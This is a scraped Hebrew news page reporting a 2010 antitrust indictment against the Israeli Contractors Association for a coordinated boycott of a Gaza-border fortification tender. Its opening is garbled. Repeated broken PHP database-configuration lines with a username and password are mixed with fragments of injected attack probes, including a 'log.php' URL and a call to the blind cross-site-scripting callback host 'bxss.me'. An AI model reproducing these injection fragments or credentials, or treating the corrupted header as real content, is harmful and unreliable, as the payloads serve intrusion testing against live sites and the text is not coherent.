$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> רשות ההגבלים העסקיים הגישה כתב אישום נגד נושאי משרה בתאחדות הקבלנים
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

הוגש כתב אישום נגד התאחדות הקבלנים ונושאי משרה בה

תאריך: 16/12/2010 17:02   מחבר: מערכת האתר

רשות ההגבלים העסקיים הגישה היום כתב אישום נגד התאחדות הקבלנים ונושאי משרה בה. ההחלטה על הגשת כתב האישום באה בעקבות חקירה שניהלה הרשות ביחס לחשדות לעבירות על חוק ההגבלים העסקיים. עבירות שבוצעו על ידי התאחדות הקבלנים ומספר חברות קבלניות עת החליטו במשותף ובתיאום מלא שלא להגיש הצעות למכרז שפירסם משרד השיכון בשנת 2008 לצורך מיגון הישובים בעוטף עזה.

על פי כתב האישום, ההתאחדות ובכירים בה המליצו לחבריה לא לגשת למכרזים בהם לא ניתן פיצוי לעלייה במחירי הברזל והתשומות לבנייה. עוד המליצו לחברים לחבור יחד בהחלטתם להימנע מהגשת הצעות, כאמצעי לחץ לשנות התנאים לטובתם.

עוד עולה מכתב האישום שפורסם כי בתחילת מאי 2008 במסגרת מגעים שקיימו ביניהם נציגי החברות הקבלניות שנכללו במאגר הקבלנים, לרבות פגישות שהתקיימו במשרדי התאחדות הקבלנים, הוסכם כי כל הקבלנים הנכללים במאגר לא יגישו הצעות למיגון מתחמים ספציפיים בשדרות ובישובי עוטף עזה במסגרת שלב ב' של המכרז. בתאם להסכמה זו, רק חברה קבלנית אחת הגישה הצעה למכרז שלב ב'.

בנוסף לאמור הנאשמים המליצו לחברי התאחדות הקבלנים לנקוט בקו פעולה לפיו לא יגישו הצעות במכרזים ממשלתיים, במסגרתם לא ניתן פיצוי על עלייה במחירי התשומות לבנייה.

במהלך שנת 2008 נשלח עלון למאגור חברי אגף בניה חוזית בהתאחדות ופורסם באתר האינטרנט שלה שיבחה ההנהלה את החברים שלא הגישו הצעות במתואם למכרזים.